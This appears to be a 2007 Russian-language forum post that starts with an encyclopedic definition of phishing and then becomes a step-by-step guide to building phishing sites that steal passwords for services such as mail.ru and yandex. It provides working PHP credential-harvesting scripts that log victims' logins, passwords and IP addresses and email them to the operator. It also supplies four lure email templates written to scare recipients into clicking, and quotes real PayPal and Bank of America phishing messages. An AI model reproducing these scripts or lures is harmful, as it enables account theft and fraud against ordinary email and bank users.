Материал из Википедии — свободной энциклопедии
Фи́шинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид мошенничества, цель которого — получить идентификационные данные пользователей.
Организаторы фишинг-атак используют массовые рассылки электронных писем
от имени популярных брендов В эти письма они вставляют ссылки на
фальшивые сайты, являющиеся точной копией настоящих. Оказавшись на
таком сайте, пользователь может сообщить преступникам ценную
информацию, позволяющую управлять своим счётом из интернета (имя
пользователя и пароль для доступа), или, даже, номер своей кредитной
карты. Успеху фишинг-афер способствует низкий уровень осведомленности
пользователей о правилах работы компаний, от имени которых действуют
преступники. В частности, около 5 % пользователей не знают простого
факта: банки не рассылают писем с просьбой подтвердить в онлайне номер
своей кредитной карты и её PIN-код.
Для защиты от фишинга производители основных интернет-браузеров
договорились о применении одинаковых способов информирования
пользователей о том, что они открыли подозрительный сайт, который может
принадлежать мошенникам. Новые версии браузеров будут обладать такой
возможностью.
В этой теме я собрал максимум
информации, необходимой для создания подобных фишинг-сайтов, иначе
называемых фейками(от англ. fake - подделка). Такие сайты далеко не
обязательно могут применяться для хищения финансовых данных. В нашем
случае они будут использоваться для похищения паролей от популярных
почтовых сервисов.
Начнем с наиболее просто реализованого фейка:
Наш фейк состоит из 4 файлов:
index.html,
log.php,
base.php,
view.php.
1. index.php:
Сохраняем браузером страницу авторизации сайта, на который мы делаем фейк...например mail.ru:
Открываем сохранённый файл (любым текстовым редактором) и ищем в нём строки, похожие на эти:
Теперь меняем pro/reg/mail.php на log.php
Получится
После этого ищем строки, содержащие hidden и удаляем их.
На этом главная страница фейка готова.
2.log.php:
log.php будет обрабатывать информацию, передаваемую из index.html, а точнее - логин и пароль.
Исходник log.php:
Код:
<?PHP
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль
$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
header("Location: http://mail.ru/"); // куда пошлем пользователя после того как он ввел данные!
?>
?>
Логин передается в переменной name в index.html
трока может быть и другой, главное в ней - переменная name.
Пароль передается, соответственно в переменной password
На этом завершим написание скрипта, ведущего лог и перейдем к
3.base.php:
В этом файле будут храниться введенные данные.
Код:
<?php echo '
Доступ к базе напрямую запрещен
'; exit; ?>
Этот код надо вписать в base.php, для того чтобы его не могли просмотреть посторонние люди.
4. view.php:
Это скрипт необходим для просмотра информации, хранящейся вфайле
base.php
Вот его исходник:
Теперь осталось залить фейк на хостинг без рекламы и начать им пользоваться )
Продолжаем тему.
Теперь напишем фейк на 3 файлах.
Файлы фейка:
index.php,
base.php,
view.php.
1. index.php:
Как уже говорилось выше,
index.php - лицо нашего фейка, теперь это лицо будет немного улучшено.
Итак, начнём:
Сначала создаём файл
index.php и копируем в него всё из нашего прошлого
index.html.
Теперь удаляем кусок (action="log.php") вот этой строчки,
Получится
Далее копируем наш старый log.php в самый конец файла index.php.
И добавляем в него ещё несколько строк...
Имеем:
Код:
<?PHP
if (!empty($_POST['login'])) // Вот эти строки проверяют не пустые ли логин и пароль и если нет, то скрипт выполняется дальше
if (!empty($_POST['passwd']))
{
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль
$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
header("Location: http://google.com/"); // куда пошлем пользователя после того как он ввел данные!
}
?>
На этом
index.php готов....
В него можно добавить еще несколько полезных вещей в виде проверки правильности заполнения формы:
Код:
<?
if (isset($_POST['login'])) { if (empty($_POST['login'])) {
?>
| Произошла ошибка, вы не ввели логин. |
<?
} }
if (isset($_POST['passw'])) { if (empty($_POST['passwd'])) {
?>
| Произошла ошибка, вы не ввели пароль. |
<?
} }
?>
Это надо добавить сразу перед строками где вводится логин и пароль.
2. base.php и
view.php делаем такие же как и в предыдущем пункте.
Вот еще 2 варианта скрипта, ведущего лог
Код:
<?PHP
$Login = $_POST['login']; //Логин
$Domain ="yandex"; // Например... можно заменить
$Pass = $_POST['passwd']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$text = "[$Data] IP:$ip MAIL:$Login@$Domain PASS:$Pass";
$to = "someone@ya.ru"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы
$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
header("Location: http://yandex.ru/"); // сюда пошлем пользователя после того как он ввел данные
?>
и
Код:
<?PHP
$Login = $_POST['login']; //Логин
$Domain ="yandex"; // Например... можно заменить
$Pass = $_POST['passwd']; // Пароль
$ip = $_SERVER["REMOTE_ADDR"]; // IP Жертвы
$Data = date("d-m-y H:i:s", time()); // Дата и время
$text = "[$Data] IP:$ip MAIL:$Login@$Domain PASS:$Pass";
$to = "***********"; // кому присылаем данные ( E-mail адресс )
$sub = " Пароль от ящика: $Login@$Domain"; // тема письма
$tomobil = "******@шлюз мобильного оператора"; // куда присылаем данные на мобильный
mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail
mail($tomobil, $sub, $text); //Отсылаем сообщение о пополнении базы на мобильный
$filelog = fopen("base.php","a+"); //открываем файл базы
fwrite($filelog,"\n $text \n"); //записываем всё
fclose($filelog); //закрываем
header("Location: http://yandex.ru/"); // куда пошлем пользователя после того как он ввел данные!
?>
Тексты писем жертвам
Вариант 1
Код:
Здравствуйте *******, в связи с новой программой повышения быстродействия и улучшения качества почтовых серверов *********.ru мы просим вас пройти небольшой тест.
Программа «быстродействие и качество» заключается в следующем: мы хотим уменьшить на наших почтовых серверах количество «ботов» и спам-отправителей.
Для этого мы проверяем всех участников нашего сервиса оригинальным тестом из нескольких заданий (аналогичных заданиям при регистрации). Эта новая система позволит нам в несколько раз уменьшить загруженность серверов и отсеять всех «ботов» и спам-отправителей.
Ссылка для теста: **************************
Нажмите на неё или скопируйте в адресную строку интернет-браузера.
Если вы не пройдете тест в течении 90 дней ваш аккаунт будет заблокирован,как неиспользующийся.
На это сообщение отвечать не нужно.
С уважением, администрация http://**********.ru.
Вариант 2
Код:
На ваш счёт поступил перевод в размере 120 рублей, для того, чтобы принять его или отказаться, перейдите по ссылке: http://****************.
На это письмо отвечать не нужно.
С уважением администрация http://***********.ru.
Вариант 3
Код:
ВНИМАНИЕ:
Вы были зачислены в наш чёрный список спам отправителей, ваш почтовый ящик будет заблокирован в течении 30 дней.
Если вы считайте что произошла ошибка и вы никогда не рассылали спам, то перейдите по этой ссылке: http://**************** и заполните там специальную форму.
На это письмо отвечать не нужно.
С уважением, администрация http://******.ru.
Вариант 4
Код:
Здраствуйте уважвемый ****** .
В связи с тем, что мы проводим массовую чистку наших почтовых серверов, вы должны перейти по специальной ссылке и там повторно авторизоваться.
Ссылка для повторной авторизации: http://********************** .
Если вы не пройдете выше указанные процедуры в течении 30 дней, ваш почтовый ящик будет удален, как неиспользующийся.
На это письмо отвечать не нужно.
С уважением, администрация ***********.ru.
И вот что недавно пришло мне на почту на gmail.com
Код:
Dear valued PayPal member,
It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.
However, failure to update your records will result in account suspension. Please update your records on or before July 9, 2007.
Once you have updated your account records, your PayPal session will not be interrupted and will continue as normal.
To update your PayPal records click on the following link:
http://207.164.80.28.static.csolve.n...bin/cmd_login/
Thank you,
PayPal Update Team
и
Код:
Bank of America
Dear Bank of America customer,
In order to be prepared for the smart card upgrade on Visa and MasterCard debit and credit cards and to avoid
problems with our ATM services, we have recently introduced additional security measures and upgraded our
software.
The security upgrade will be effective immediately and requires our customers to update their ATM card
information. Please update your information by following the link given below.
http://www.bankofamerica.com/OnlineBanking/index.jsp
We are committed to delivering your quality service that is reliable and highly secure. This email is one of many components designed to ensure your information is safeguarded at all times.
Please do not reply to this message. For any inquiries, contact Customer Service.
Copyright 1999 - 2007 Bank of America. All rights reserved.
14 сентября 2007 | 
Автор: 
Просмотров: 1433 |
ICQ: --
